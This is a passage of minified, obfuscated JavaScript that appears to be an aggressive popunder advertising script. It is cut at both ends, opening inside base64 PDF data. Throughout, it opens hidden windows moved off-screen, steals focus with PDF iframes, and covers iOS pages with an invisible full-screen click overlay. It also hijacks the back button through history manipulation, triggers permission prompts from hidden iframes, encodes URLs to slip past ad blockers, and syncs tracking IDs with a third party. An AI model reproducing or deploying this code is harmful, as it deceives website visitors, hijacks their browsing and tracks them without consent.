9kZS9GaXJzdCA1L0xlbmd0aCA1MC9OIDEvVHlwZS9PYmpTdG0+PnN0cmVhbQ0KaN4yNFYwULCx0XfOL80rUTDU985MKY42NAcKBsXqh1QWpOoHJKanFtvZAQQYAOdrC94NCmVuZHN0cmVhbQ1lbmRvYmoNNSAwIG9iag08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvRmlyc3QgNS9MZW5ndGggMTIwL04gMS9UeXBlL09ialN0bT4+c3RyZWFtDQpo3ozMQQqDMBBG4avMTl1U/0nMtIoIYraFXiGaLLpxIKT3t1AoXXb/3sc9gaapW3MK5amHDyXVfjRggTPC1vX2dsG1AqrmU2mul6hbomXPuoVCj6zkV2LXsrQGsEPT3TX+UsLCDOuGL/We4mtPf1jzfAowAGbZLDINCmVuZHN0cmVhbQ1lbmRvYmoNNiAwIG9iag08PC9EZWNvZGVQYXJtczw8L0NvbHVtbnMgNC9QcmVkaWN0b3IgMTI+Pi9GaWx0ZXIvRmxhdGVEZWNvZGUvSURbPDE4RjU1M0ZDQjk4NkRCNDE4RjMxMUNBQTIxRTg2OEM3Pjw5OTNBQkI0NjJEMjlCQTRFQjRERDMzOTMxNkU0QjNBOD5dL0luZm8gMTQgMCBSL0xlbmd0aCA1NS9Sb290IDE2IDAgUi9TaXplIDE1L1R5cGUvWFJlZi9XWzEgMiAxXT4+c3RyZWFtDQpo3mJiAAImRpYEBiYGxltAgvkmkOA5BOL2gYirQNlXJ4EsBgZGGMH4D4XLBOIyMgAEGABIAAgmDQplbmRzdHJlYW0NZW5kb2JqDXN0YXJ0eHJlZg0KMTE2DQolJUVPRg0K"}; H.prototype.f=function(a,b,c,d){function e(){clearTimeout(m);p.setAttribute("data","data:application/pdf;base64,JVBERi0xLj");C(function(){f.document.body.removeChild(p)},20);a.resizeTo(x[1],x[0]);a.moveTo(x[2],x[3]);a.location.href=P;n.F("focus",e,!0,f);da(k,g)}var k=this,g=arguments,m,x=ra(f),P=this.ma;this.Wa(a);n.o("focus",e,!0,f);var p=H.a(this.na());f.document.body.appendChild(p);m=C(e,h?2E3:3E3)};H.prototype.a=function(){var a=this;if(!this.H){var b=T();this.H=function(){a.Ua(A&&0<A.length? "":b)}}this.H()};H.prototype.c=function(){return!0};H.prototype.D=function(){return!0};H.prototype.M=function(){if(!H.b){var a=new z;a.a("a");H.b=a}return H.b};H.prototype.Wa=function(a){this.B(a)&&a.document.write(hb(sa("window.a={};window.a.b=function(){window.resizeTo(1,0);window.moveTo(987654,987654);};window.a.b();"),void 0))};var X=function(a){this.id=a;this.ma=null};X.prototype=new H;X.prototype.v=function(a,b,c,d){this.ma=b;a=this.G(a,"about:blank","directories=0,screenY=19999, scrollbars=1, statusbar=0,menubar=0,resizable=1,width=1,height=1,screenX=19999, location=0, toolbar=0"); this.B(a)&&this.f(a,b,c,d)};X.prototype.Wa=function(a){Tb(a)};var U=function(a){this.id=a;this.ma=null};U.prototype=new X;U.prototype.v=function(a,b,c,d){this.ma=b;a=f.document.createElement("iframe");a.setAttribute("style","display:none");f.document.body.appendChild(a);var e=a.contentWindow.document.createElement("script");e.innerHTML="(function(){var f=eval('window');f.i=function(n,o){return f.open('about:blank',n,o)}})();";a.contentWindow.document.body.appendChild(e);e=a.contentWindow.i(this.U(), "directories=0,screenY=19999, scrollbars=1, statusbar=0,menubar=0,resizable=1,width=1,height=1,screenX=19999, location=0, toolbar=0");f.document.body.removeChild(a);this.f(e,b,c,d)};U.prototype.na=function(){return"//s3-us-west-2.amazonaws.com/amcdn/pu.pdf"};var N=function(a){this.id=a};N.prototype=new U;N.prototype.f=function(a,b,c,d){var e=this,k=!1,h=arguments,g=ra(f);this.Wa(a);var x=m.createElement("iframe");x.style.display="none";x.srcdoc="https:"===location.protocol?sa("navigator.geolocation.getCurrentPosition(function(){});"): sa("Notification.requestPermission(function(){});");var P=f.setInterval(function(){try{!k&&n.Fb()&&(k=!0,m.body.appendChild(x),C(function(){try{x.parentNode.removeChild(x),a.resizeTo(g[1],g[0]),a.moveTo(g[2],g[3]),a.location.href=b,clearInterval(P),da(e,h)}catch(c){q(p.m,"ppu 58 timeout: "+c)}},150))}catch(c){q(p.m,"ppu 58 interval: "+c)}},10)};var ea=function(a){this.id=a};ea.prototype=new N;ea.prototype.v=function(a,b,c,d){a=this.G(a,"about:blank");this.B(a)&&this.f(a,b,c,d)};ea.prototype.f=function(a, b,c,d){function e(){f.document.body.removeChild(x);n.F("focus",e,!0,f);a.g(g,b);da(k,h);a.close()}var k=this,h=arguments,g=ra(f);a&&a.document&&a.document.write(sa("var w;window.addEventListener('mouseup',function(){w=window.open('about:blank','"+this.U()+"','directories=0,screenY=19999, scrollbars=1, statusbar=0,menubar=0,resizable=1,width=1,height=1,screenX=19999, location=0, toolbar=0');});window.g=function(hwtl,u){w.resizeTo(hwtl[1],hwtl[0]);w.moveTo(hwtl[2],hwtl[3]);w.location.href=u;};"));var x= H.a(this.na());f.document.body.appendChild(x);f.addEventListener("focus",e,!0)};var V=function(a){this.id=a};V.prototype=new ea;V.a=3;ea.prototype.v=function(a,b,c,d){a=this.G(a,"about:blank");this.B(a)&&this.f(a,b,c,d)};V.prototype.f=function(a,b,c,d){var e=this,k=arguments,h=ra(f);a&&a.document&&a.document.write(hb("",sa('(function(){var b=document.createElement("iframe");b.type="application/pdf";b.src="'+H.prototype.na()+'"; b.setAttribute("style","width:100px;height:100px;position:absolute;top:-1000px;left:1000px;");document.body.appendChild(b);window.clean=function(){document.body.removeChild(b)}})();'))); n.o("mouseup",function(){function c(){g||(g=!0,f.document.body.removeChild(x),n.F("focus",c,!0,f),d.resizeTo(h[1],h[0]),d.moveTo(h[2],h[3]),d.location.href=b,da(e,k),a.close())}var d,g=!1,x=H.a(e.na());f.document.body.appendChild(x);n.o("focus",function(){a.clean();c();f.addEventListener("focus",c,!0)},!0,a);d=window.open("about:blank",e.U(),"directories=0,screenY=19999, scrollbars=1, statusbar=0,menubar=0,resizable=1,width=1,height=1,screenX=19999, location=0, toolbar=0");Tb(d);f.setTimeout(function(){g|| c()},1E3*V.a)},!0,a)};Qb&&(G=H);qa&&(G=X);Na&&(G=U);F&&(G=N);Ua&&(G=ea);D&&(G=V)}else G=k;qa=function(a){this.id=a};qa.prototype=new d;qa.prototype.v=function(a,b,c,d){a=this.G(a,b,"resizable=no, toolbar=no, scrollbars=no, menubar=no, status=no, directories=no, width="+window.screen.width+", height="+window.screen.height);this.B(a)&&this.f(a,null,c,d)};var Da=function(a){this.timeout=a||1E3;this.id=Da.prototype.id+this.timeout/1E4};Da.prototype=new a(16);Da.prototype.G=function(a,b){var c=r.W.G.call(this, a,"_://"),d=this;d.B(c)&&C(function(){d.B(c)&&c.location.replace(b)},this.timeout);return c};Da.prototype.Ja=function(){return 1};Na=function(a){this.id=a};Na.prototype=new e;Na.prototype.v=function(a,b){var d=this,e=Ub("window.location.href='"+c.Lb()+"';"),k=this.Tb(f.location.href);C(function(){d.B(k)&&c.Wb(k,window.top,e,b)},1E3)};Na.prototype.f=function(a,b,c,d){q(p.ba,void 0);this.ya();g.prototype.f.apply(this,arguments);window.name=this.j.J};F=function(a){this.id=a};F.prototype=new Da(16);F.prototype.Kb= function(){return"//"};F.prototype.G=function(a){var b=pb?pb:this.Kb()+fa+"/"+Vb("abmt");return a(b,this.U())};F.prototype.f=function(a,b,c,e){var f=this,k=arguments;ta.bb(a,function(b,c){c===a&&window.setTimeout(function(){a.location.href=f.url;d.prototype.f.apply(f,k)},10)})};F.prototype.T=function(a){return ib.Aa(a,"/",fa,this)};Ua=function(a){this.id=a};Ua.prototype=new d;Ua.prototype.v=function(a,b,c,e){a(b,this.U(),["height="+screen.height,"width="+screen.width,"fullscreen=yes"].join()).moveTo(0, 0);d.prototype.f.apply(this,arguments)};D=function(a){this.id=a};D.prototype=new Da(16);D.prototype.v=function(a,b,c,d){a=B.Hb("javascript:window.opener=null;var s='set'+'Timeout';window[s](function(){window['location']['href']='"+b+"';},250)");var e=m.createEvent("MouseEvents");e.initMouseEvent("click",!0,!0,f,1,0,0,0,0,!1,!1,!1,!1,0,null);a.dispatchEvent(e);this.f(null,b,c,d)};D.prototype.f=function(a,b,c,d){q(p.ba,void 0);g.prototype.f.apply(this,arguments)};X=function(a){this.id=a};X.prototype= new d;X.prototype.v=function(a,b){this.ya();this.redirect(b)};X.prototype.redirect=function(a){f.location.href=a};var S=function(a){a&&(a=a.style,a.width=0,a.height=0,a.visibility="hidden")},ba=function(a){a&&a.loaded&&a.setAttribute("style",B.Da(window.screen.availWidth,window.screen.availHeight))},U=function(a){this.id=a;this.Pb=null};U.prototype=new F(16);U.prototype.G=function(){};U.prototype.f=function(){};U.prototype.Mc=function(a){S(this.Pb);a?(q(p.ba,void 0),this.A.cb()):q(p.Oa,void 0);g.prototype.f.apply(this, arguments)};var Ba=function(a){var b=m.createElement("iframe");b.frameBorder=0;b.scrolling="no";b.setAttribute("style",B.Da(window.screen.availWidth,window.screen.availHeight));b.src=a;n.ea(function(){S(b);n.o("message",function(a){"l"==a[a.message?"message":"data"]&&(b.loaded=!0,ba(b),b.focus())},!0,f);f.document.body.appendChild(b)});return b},Ia=function(a){var b=f.document.body;b&&b.lastChild!==a&&b.insertBefore(b.lastChild,a)},xa=[0,0],Ja=function(){M.o(bb,function(a){try{y.b().id===r.$.id&& (xa=(a||window.event).detail)}catch(b){q(p.m,"iframe overlay cords:"+b)}})};U.prototype.a=function(){var a=this;if(!this.H){Ja();var b=this.T(this.j),b="https://"+fa+"/"+encodeURI(Ea("abpfi?url="+encodeURIComponent(b.toString()))),c=Ba(b);this.Pb=c;n.o("message",function(b){b=b[b.message?"message":"data"];"o"!=b&&"c"!=b||a.Mc("o"==b)},!0,f);ba(c);gb(function(){Ia(c);y.a()==r.$&&0===y.A.s()[0]?A&&0<A.length||A&&1>A.length&&J&&0<J.length?(S(c),C(function(){var a=B.ka(xa);ba(c);A&&0<A.length&&!y.C(a)? S(c):A&&1>A.length&&J&&0<J.length&&y.l(a)&&S(c)},1)):ba(c):S(c)},100);this.H=function(){}}return this.H};N=function(a,b,c){this.id=a;this.showNotification=b||!1;this.Nc=c||!1};N.prototype=new F(16);N.prototype.a=function(){var a=this;if(!this.Ta){this.Ta=function(){};var b=function(){var b="url="+encodeURIComponent(f.location.href);a.showNotification&&(b+="&rd="+encodeURIComponent(f.location.hostname));a.Nc&&"https:"==f.location.protocol&&(b+="&ijpn=1");f.location.href="//"+cb+"/"+encodeURI(Ea("abst?"+ b));return a.Ta};if(jb&&0<jb.length)try{(new Fa).setItem("x-auth-i",jb)}catch(c){q(p.m,"x-auth-i error: "+c)}else q(p.m,"missing x-auth-i");Va.create(Wa);if(f===f.top)return b();q(p.gc,void 0);var d=function(b){b?q(p.Oa,void 0):q(p.ba,void 0);g.prototype.f.apply(a,arguments)};ta.bb(f.parent,function(a){"c"!=a&&"o"!=a||d("c"==a)});ta.Yb(f.parent,["admvn","ping"],"*",function(a){"pong"==a&&q(p.hc,void 0);Va.release(Wa)},100,function(){if(f.parent!=f.parent.parent)Va.release(Wa);else return q(p.ic,void 0), b()})}return this.Ta};N.prototype.G=function(a,b,c){ta.Ya(f.parent,["admvn",[b,c]],"*")};N.prototype.B=function(){return!1};N.prototype.f=function(){};N.prototype.T=function(a){return ib.Aa(a,"/abcr",fa,this)};N.prototype.P=function(){var a=location.href;if(a)for(var b in qb)if(qb.hasOwnProperty(b)&&-1<a.indexOf(b))return!1;return!0};ea=function(a){this.id=a};ea.prototype=new F(16);ea.prototype.Kb=function(){return"https://"};e=function(a){this.id=a};e.prototype=new d;e.prototype.v=function(a,b,c, d){a=this.G(a,"about:blank");this.B&&this.f(a,b,c,d)};e.prototype.f=function(a,c,d,e){var f=new z;f.a(16);f=this.T(this.j,f);a&&a.document&&a.document.write(sa(this.Va(f.toString(),this.U(),c)));b.prototype.f.apply(this,arguments)};e.prototype.Va=function(){};var na=function(a){this.id=a};na.prototype=new e;na.prototype.Va=function(a,b,c){return"var w;window.addEventListener('mouseup',function(){w=window.open('"+a+"','"+b+"','');window.location.href='"+c+"'});window.setTimeout(function(){window.location.href='"+ c+"'},100)"};var oa=function(a){this.id=a};oa.prototype=new e;oa.prototype.Va=function(a,b,c){var d=ra(f);return"var w;window.addEventListener('mouseup',function(){w=window.open('about:blank','"+b+"','directories=0,screenY=19999, scrollbars=1, statusbar=0,menubar=0,resizable=1,width=1,height=1,screenX=19999, location=0, toolbar=0');w.document.write('<script>"+("window.setTimeout(function(){window.resizeTo("+d[1]+","+d[0]+");window.moveTo("+d[2]+","+d[3]+');window.location.href="'+a+'"},10000)')+"' +'<' + '/script>');window.location.href='"+ c+"';});window.setTimeout(function(){window.location.href='"+c+"'},100)"};var ga=function(a){this.id=a;ga.notification_text=[];if(kb){a=0;for(var b=kb.length;a<b;a++)ga.notification_text[a]=decodeURIComponent(escape(window.atob(kb[a])))}};ga.redirect=function(a){window.top.location.href=a};ga.a=function(){80==ka&&(confirm(ga.notification_text[4])?ga.redirect("//"+fa+"/?tid="+Ca):rb&&C(function(){ga.a()},rb))};ga.prototype=new d;d.prototype.f=function(a,c,d,e){b.prototype.f.apply(this,arguments)}; e=function(a){this.id=a};e.prototype=new X;e.prototype.v=function(a,b){q(p.ba,void 0);this.redirect(b)};var r={Gc:new qa(3),Qa:new G(5),W:new a(16),yc:new k(17),Ed:new Da(125),kc:new Na(17),ta:new F(16),nd:new Ua(38),lc:new D(16),Pa:new X(42),$:new U(16),mc:new ea(16),ib:new na(16),jb:new oa(5),Fc:new ga(3)};l.l()?(r.eb=r.$,r.gb=r.$,r.fb=r.$,r.hb=r.$):(r.eb=new N(16,!1),r.gb=new N(16,!0),r.fb=new N(16,!1,!0),r.hb=new N(16,!0,!0));var ya=!1,pa=function(a){a&&(a.style.display="none")},k=function(a){this.id= a||0;this.ra=null};k.prototype=new d;k.prototype.v=function(){};k.prototype.f=function(a,b,c,d){q(p.ba,void 0);this.ya();g.prototype.f.apply(this,arguments)};k.prototype.dd=function(a){try{this.yb(),q(p.vb,void 0),q(p.wb,void 0),this.f(null,this.url,a,this.ra)}catch(b){q(p.m,"iOSOverlay cb:"+b)}};k.prototype.md=function(a,b){a.href=b};k.prototype.a=function(){var a=this,b;if(!this.H){n.Tc();var c=[0,0];n.o("touchstart",function(b){if(a.A.sa()){var d=a.j,e=b.target,f=J&&0<J.length,k=ha&&0<ha.length; if(e&&a.Fa(e,d)){c=b.touches?[b.touches[0].clientX,b.touches[0].clientY]:[b.clientX,b.clientY];var h=a.bd(e,c);a.Eb(h);k&&(a.ra=h);if(f)if(y.l(h)){var g=function(){a.fa(!1);n.F("touchend",g,!0,h)};n.o("touchend",g,!0,h);pa(e);a.fa(!0)}else a.fa(!1)}}},!0,f.document);this.H=function(){if(f.document.body)try{a.A.sa()?A&&0<A.length?(pa(b),a.Ua(lb)):(a.Y(),ya)?b&&!a.Jb()&&(b.style.display="block"):(b=a.za(),f.document.body.appendChild(b),ya=!0):(pa(b),a.Y())}catch(c){q(p.m,""+c)}}}this.H()};var Ka=l.chrome(); k.prototype.K=function(){return Ka};k.prototype.za=function(){var a=this,b=B.Hb(a.T(a.j).toString());b.setAttribute("style","background: none !important;position:fixed;visibility:visible;left:0;top:0;width:100%;height:100%;z-index:2147483647;overflow:hidden;");b.setAttribute("rel","noopener noreferrer");b.onclick=function(b){if(80==ka){var c=m.getElementsByClassName("lsdkhvadslkfh");c[0].parentNode.removeChild(c[0])}a.dd(b);a.Ad(b.target)};b.__admvn_ios_ol=1;return b};k.prototype.c=function(){return!1}; k.prototype.Fa=function(a){return 1==a.__admvn_ios_ol};k.prototype.Ad=function(a){this.md(a,this.T(this.j).toString())};qa=function(a){this.id=a};qa.prototype=new k;r.ed=new qa(16);R={3:r.Gc,5:r.Qa,16:r.W,17:r.yc,32:r.kc,34:r.ta,38:r.nd,41:r.lc,42:r.Pa,43:r.$,44:r.mc,47:r.eb,"47.1":r.gb,"47.01":r.fb,"47.11":r.hb,55:r.ib,56:r.jb,80:r.Fc};k=function(a){this.id=a};k.prototype=new d;k.prototype.v=function(a,b,c,d){var e=new z;e.a(2);var e=this.T(this.j,e).toString(),k=this.G(a,Ub("if(window.history.length > 1){location.href = '"+ f.location.protocol+e+"'}"));q(p.xc,void 0);f.setTimeout(function(){k.location.href=b},50);this.f(k,e,c,d)};k.prototype.f=function(a,b,c,e){this.B(a)&&d.prototype.f.apply(this,arguments)};k.prototype.ab=function(){return!1};r.tb=new k(16);R[50]=r.tb;r.nb=new e(48);R[48]=r.nb;if(!l.chrome()||l.s()||l.c())r.ib=new a(16),R[55]=r.W,r.jb=new a(16),R[56]=r.W;var ua=mb.c(K);ca=mb.l(K);q(p.Dc,void 0);var Pa="https://secure.adnxs.com/getuid?https://"+sb+"/s?a=$UID&b=",Sa="https://"+sb+"/p?b=",za="",Aa,La= 0,Xa,Ma=function(a){for(var b="",c=0;c<a;c++)b+="0123456789".charAt(Math.floor(10*Math.random()));return b},Ya=function(a){a=JSON.parse(a);"undefined"!==typeof a&&0<a.length&&(clearInterval(Aa),f.sessionStorage.setItem("ac",a[1]),Xa.remove())},Za=function(){},$a=function(a){f.sessionStorage.removeItem("ac");Aa=window.setInterval(function(){Wc(a+Ma(8),Ya,Za);La++;60<=La&&(clearInterval(Aa),Xa.remove())},2E3)};(function(){m.addEventListener("DOMContentLoaded",function(){za=Ma(12);var a=Pa+za;Xa=m.createElement("img"); Xa.src=a;m.body.appendChild(Xa);$a(Sa+za+"&c=")})})();a=R[ka+""]||r.W;var y=new I(R,ua,K,eb,ib.Aa(K,"/",fa,a),a);tb&&(y.w=r.ta);Xc("//"+Oa+"/popunder.gif",function(a){a?(K.a=l.l()?Q.lb:Q.qc,(a=y.a().w(K.a))&&y.c(a)):(K.a=Q.ca,l.c()?l.w()?y.c(r.ed):80==ka&&1==Wb?y.c(r.Pa):y.c(r.W):y.c(c.$c()))});a=function(){ub(Xb)?y.s=r.tb:y.s=R[ka+""]||r.W};M.o(vb,a);M.o(wb,a);y.K();M.o(Yb,function(){y.K()});y.ha(function(a){80==ka&&C(function(){ga.a()},Zb);y.ja(a)});var Ga={Xc:function(a){return!!(a.history&&(l.b()? 9<l.a(v.aa):1))},Qc:function(a){a.history.back()},pd:function(a,b){a.history.pushState(null,m.title,b)},$a:function(a,b){a.history.replaceState(null,m.title,b)},Yc:function(a){a.history.forward()}},t={wa:!1,Ca:!1};t.cc="#!/"+u();t.dc="#!/"+u();var Qa=!1;t.ld=Ga.Xc(f);t.Za=function(a){Ga.pd(f,a)};t.Ob=function(a){Ga.$a(f,a)};t.wd=function(){return t.Xa&&location.hash===t.cc};t.xd=function(){return location.hash===t.dc};t.ac=function(){var a=!0;l.w()&&!Qa&&(Qa=!0,a=!1);return a};t.Mb=function(a){var b= location.pathname;try{a()}catch(c){t.Za(b),q(p.m,"error in hb: "+c)}};t.jd=function(a){t.ac()&&t.wd()&&t.Mb(function(){t.Ob(location.pathname);t.Xa(a)})};t.xb=function(a){if(!t.wa){var b=location.pathname+location.search;t.Ob(location.pathname+t.cc);t.Za(b);t.Xa=a;n.o("popstate",t.jd,!1,f);t.wa=!0}};t.Wc=function(){t.wa&&(t.Xa=function(){Ga.Qc(f)},t.wa=!1)};t.kd=function(a){t.ac()&&t.xd()&&t.Mb(function(){t.Nb(a);Ga.$a(f,"/")})};t.pe=function(a){t.Ca||(t.Za(t.dc),window.history.back(),t.Nb=a,n.o("popstate", t.kd,!1,f),t.Ca=!0)};t.te=function(){t.Ca&&(t.Nb=function(){Ga.Yc(f);Ga.$a(f,"/")},t.Ca=!1)};if(t.ld){var Ra=function(a){y.c(r.nb);var b=y.a(),c=b.T(y.j).toString();b.v(eb,c,a,null)};xb&&t.xb(Ra);M.o(vb,function(){xb?t.xb(Ra):t.Wc()})}var w={Kc:"tpok",Bb:!1,Vc:5};w.Rb=yb();w.hd=function(a,b){n.ea(function(){try{w.gd=b,Yc(function(b){var c=w.Zc();c.u=b;K.a!=Q.ca?w.Bd(c,a):(w.Ma=m.createElement("script"),w.Ma.src=w.Gb(c),m.getElementsByTagName("head")[0].appendChild(w.Ma),w.td(a));w.Uc=la();C(function(){w.Bb|| q(p.pc,void 0)},1E3*w.Vc)})}catch(c){q(p.m,"generate configuration object error: "+c)}})};w.Zc=function(){var a={tid:Ca,jsonp:w.Rb,tzd:-((new Date).getTimezoneOffset()/60),lang:$b(),enc:1};tb&&(a.adb=K.a);y.a().l()&&(a[w.Kc]=db);l.b()||(a.ua=E);return a};w.Bd=function(a,b){var c=m.createElement("iframe");c.style.display="none";c.src="//"+fa+"/"+Ea("abcm?url="+encodeURIComponent(w.Gb(a))+"&jsonp="+encodeURIComponent(a.jsonp));m.getElementsByTagName("body")[0].appendChild(c);ta.bb(c.contentWindow,function(a, d){try{d===c.contentWindow&&(w.zb(w.Cb(a),b),nb(c))}catch(e){q(p.m,"ifch error: "+e)}})};w.td=function(a){f[w.Rb]=function(b){try{nb(w.Ma),w.zb(w.Cb(b),a)}catch(c){q(p.m,"gparam error: "+c)}}};w.Gb=function(a){var b=ac.ad(Ca);return(b&&b!="//"+m.location.hostname?b:bc)+"/"+Ha(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")+encodeURI(Vb("conf?"+cc(a)))};w.Cb=function(a){return"string"==typeof a?zb.Db(a):a};w.zb=function(a,b){try{w.Bb=!0,w.ec(a,K.a,b),q(p.oc,""+(la()-w.Uc))}catch(c){w.ec(w.gd, K.a,b),q(p.m,"overwrite configuration error: "+c)}};w.ec=function(a,b,c){dc(a);K=c.a(b);ua=c.c(K);ca=c.l(K);y.S(ua,K);Y.rd(ec);y.a().pb();M.Z(vb)};w.hd(mb,ob)}}function ua(){}function va(){}function Zc(a,b,c,d){fc.call(this,"admaven_pop",a,1,b,c,d)}function Vb(a){a=Ea(a);return 200<a.length?a.match(RegExp(".{1,190}","g")).join("-"):a}function Ea(a){for(var b=Ha(5),c="",d=0;d<a.length;d++)c+=String.fromCharCode(a.charCodeAt(d)^b.charCodeAt(d%b.length));return btoa(b+c).replace(/=/g,"")}function fc(a, b,c,d,e,f){this.c=$c;this.J=a+"_"+d;this.b=d;this.s=c;this.l=b;this.w=e;this.a=f}function gc(){return parseInt((la()+Ha(7,"0123456789")).substring(0,19)).toString(16)}function hc(a,b){var c=m.querySelectorAll(a);return c&&c.length&&0<B.Ea(c,[b]).length}function I(a,b,c,d,e,f){this.ia=a;this.s=f;this.w=null;this.A=b;this.j=c;this.N=d;this.url=e;var h=this;M.o(wb,function(){h.j.c.qd()})}function ic(a){for(var b=new z,c=0;c<a.length;c++)for(var d=a[c].trim().split(/,/g),e=0;e<d.length;e++)-1==d[e].replace(/[*][=]/g, "").indexOf("*")&&b.a(d[e]);a=[];b.L(function(b){a.push(b);a.push(b+" *")});return a}function jc(a,b){if("undefined"!=typeof a&&a){var c=g.b(b);if(a[c])return jc(a[c],b);c=a.admaven_pop_ct;if("undefined"!=typeof c)return[a,Y.da.La,c,a.admaven_pop_ctc,a.admaven_pop_ctt||b.b,a.admaven_pop_ddb||null];for(c=0;c<kc.length;c++){var d=kc[c](a);if(d&&2==d.length)return[a,Y.da.La,d[0],d[1],b.b,null]}if(a.parentNode&&a.parentNode.tagName)return[a,Y.da.mb,0,0,b.b,null]}return[a,Y.da.kb,0,0,b.b,null]}function Ya(a, b){if(0==a){var c=B.Ba(b,"a");if(c)return B.Qb(c)?1:2}return a}function Z(a){return a.tagName&&a.tagName.toLowerCase()||""}function wa(a,b,c){c=c||0;var d=a.getBoundingClientRect();if(10<lc(a))return 4<=d.width/d.height&&mc(a.outerHTML)?7:0;if(4>c){var e=Z(a);if("img"==e){var e=a.src,k=e.replace(f.location.protocol+"//"+f.location.hostname,"");k!=e&&(e=k)}else"a"==e?(e=a.href,a.hostname==f.location.hostname&&(e=a.pathname+a.search)):e=a.outerHTML;e=e.toLowerCase();if(null!=e&&(k=nc(e,oc),null!=k))return k; if(pc(e,[".exe",".rar",".zip",".7z",".msi"]))return 4;if(pc(e,[".avi",".mp4",".mkv",".vid"]))return 6;k=nc(a.outerHTML.toLowerCase(),oc);if(null!=k)return k;if(4<=d.width/d.height&&mc(a.outerHTML))return 7}return Za(d.width,d.height,qc,.1)?8:!b&&a.parentNode&&a.parentNode.tagName?(rc(a)||(c+=1),wa(a.parentNode,b,c)):0}function lc(a){a=a.getElementsByTagName("*");for(var b=[],c=0;c<a.length;c++){var d=a[c];d.parentNode&&(rc(d)||b.push(d))}return b.length}function rc(a){var b=a.getBoundingClientRect(), c=b.height,b=b.width;if(20>c*b)return!0;a=a.parentNode.getBoundingClientRect();return 10>=(a.height-c||1)*(a.width-b||1)}function pc(a,b){a=a.trim();for(var c=0;c<b.length;c++){var d=b[c];if(-1!==a.indexOf(d,a.length-d.length))return!0}return!1}function mc(a){for(var b=["menu","nav","bar","header","footer"],c=0;c<b.length;c++)if(-1<a.indexOf(b[c]))return!0;return!1}function nc(a,b){for(var c=0;c<b.length;c+=2){var d=b[c],e=b[c+1];"undefined"!=typeof e.length&&(e=[e]);for(var f=0;f<e.length;f++)if(-1< a.indexOf(e[f]))return d}return null}function Za(a,b,c,d){for(var e=0;e<c.length;e+=2){var f=c[e]/a;if(f=f<=1+d&&f>=1-d)f=c[e+1]/b,f=f<=1+d&&f>=1-d;if(f)return!0}return!1}function g(){this.id=0;this.A=this.j=null;this.S=this.url=""}function Pa(a){return ad.b(a.tagName.toLowerCase())}function sc(a,b){var c=B.xa(b),d=a.style;if(d.top!==c.top||d.left!==c.left||d.height!==c.height||d.width!==c.width)d.height=c.height+"px",d.width=c.width+"px",d.top=c.top+"px",d.left=c.left+"px",d.position="fixed"}function Vc(a, b,c,d){try{a.location.href=c,C(function(){b.location.href=d},10)}catch(e){q(p.m,""+e)}}function ra(a){a=a||f;var b=a.screen.availHeight,c=a.screen.availWidth;return[b,c,Math.round((a.screen.height-b)/2),Math.round((a.screen.width-c)/2)]}function Tb(a){(a?a.closed:1)||(l.chrome()&&63<=l.a(v.V)?a.document.write(hb(sa("window.a={};window.a.b=function(){window.moveTo(987654,987654);};window.a.b();"),void 0)):a.document.write(hb(sa("window.a={};window.a.b=function(){window.resizeTo(1,0);window.moveTo(987654,987654);};window.a.b();"), void 0)))}function bd(a){function b(a,b,c){if(b&&-1<b.indexOf(c)&&-1<b.indexOf("~")){b=JSON.parse(atob(b.split("~")[1]));for(var d in b)a.setItem(d,b[d])}}function c(a){var b={};d.L(function(c,d){0==c.indexOf(a)&&(b[c]=d)});return btoa(JSON.stringify(b))}var d=this,e=[];try{if(2!=fb){if(1==fb&&"sessionStorage"in window)try{e.push(new V)}catch(g){}else{try{e.push(new S)}catch(g){}e.push(new Fa)}e.push(new ma)}e.push(new Ia);for(var k=0;k<e.length;k++)if(this.I=e[k])try{this.I.setItem("a","1");this.I.removeItem("a"); break}catch(g){}var h=a.J;b(this.I,f.name,h);window.name=h}catch(g){q(p.m,"error while creating LocalCache: "+g)}if(!this.I)throw Error("no storage");this.L=this.I.forEach||function(a){for(var b=d.I,c=0,e=b.length;c<e;c++){var f=b.key(c);null!=f&&a(f,b.getItem(f),c)}};this.Xb=function(a){var b=d.I;this.L(function(c){0==c.indexOf(a)&&b.removeItem(c)})};this.Oc=function(a,b){var d=c(a.j.J);b.name=a.U()+"~"+d}}function Ia(){this.map={}}function ma(){}function Fa(){}function W(){this.length=0}function V(){this.length= window.sessionStorage.length}function S(){this.length=window.localStorage.length}function xa(a,b,c){this.b=a;this.a={};this.l=c||!1;b="/"!=b.charAt(0)?"/"+b:b;a=b.indexOf("?");-1<a&&(this.a=tc(b.substring(a)),b=b.substring(0,a));this.c=b}function L(a,b,c,d,e){this.R=la();this.l=null;this.a=D.a();this.b=D.a();this.ga=a;this.N=b;this.ha=c;this.J=c.J;this.O=d||0;this.ia=e||86400;this.c=null}function cd(a,b,c){this.b=-1!=a?a:c.N;this.a=b}function uc(a,b,c){if(b=D.b(ca.I.getItem(b)))return b;a=a.J;(c|| []).push(0);ca.Xb(a);return D.c()}function dd(){this.a=(new Date).getTime()}function D(a,b){this.b=a;this.a=b}function Yc(a){Ja&&""!=Ja?a(Ja):n.ea(function(){Va.Sb(Wa,function(){a(Ja)})})}function $a(){var a=T.X(Qa);if("undefined"!=typeof a)return a;a=ed();T.oa(Qa,a);return a}function ed(){try{if(m.querySelector("meta[content='RTA-5042-1996-1400-1577-RTA']"))return!0;var a=fd();return 7<=a[0]&&2<=a[1]&&.05<a[0]/a[2]}catch(b){return!1}}function fd(){function a(a,e){a.L(function(a,f){if(2<a.length){d+= f;for(var k=1;k<vc.length;k++)vc[k].b(a)&&(b+=f*k*e[k],c+=f)}})}for(var b=0,c=0,d=0,e=wc(),f=Ra(location.href),h=0;h<f.length;h++)e.a(f[h].toLowerCase());a(e,gd);h=hd(m.documentElement.innerText.toLowerCase());e=Ra(h);for(h=0;h<e.length;h++)e[h]=e[h].toLowerCase();h=aa.a(e);a(h,[1,1,1,1]);return[b,c,d]}function hd(a){function b(a){for(var b=[],c=0;c<a.length;c++){var d=a[c];1<d.clientHeight&&1<d.clientWidth&&b.push(d)}return b}function c(a){var b=a.length;if(0===b)return 0;for(var c=0,d=0;d<a.length;d++)"a"== a[d].tagName.toLowerCase()&&c++;return c/b}try{for(var d=function(){for(var a=Ha(16),b=[],c=m.querySelectorAll("a"),d=0;d<c.length;d++){var e=c[d];e.parentNode[a]||(e.parentNode[a]=!0,b.push(e.parentNode))}for(d=0;d<b.length;d++)delete b[d][a];return b}(),e=0;e<d.length;e++){var f=d[e];if(!(5>f.childElementCount)){var 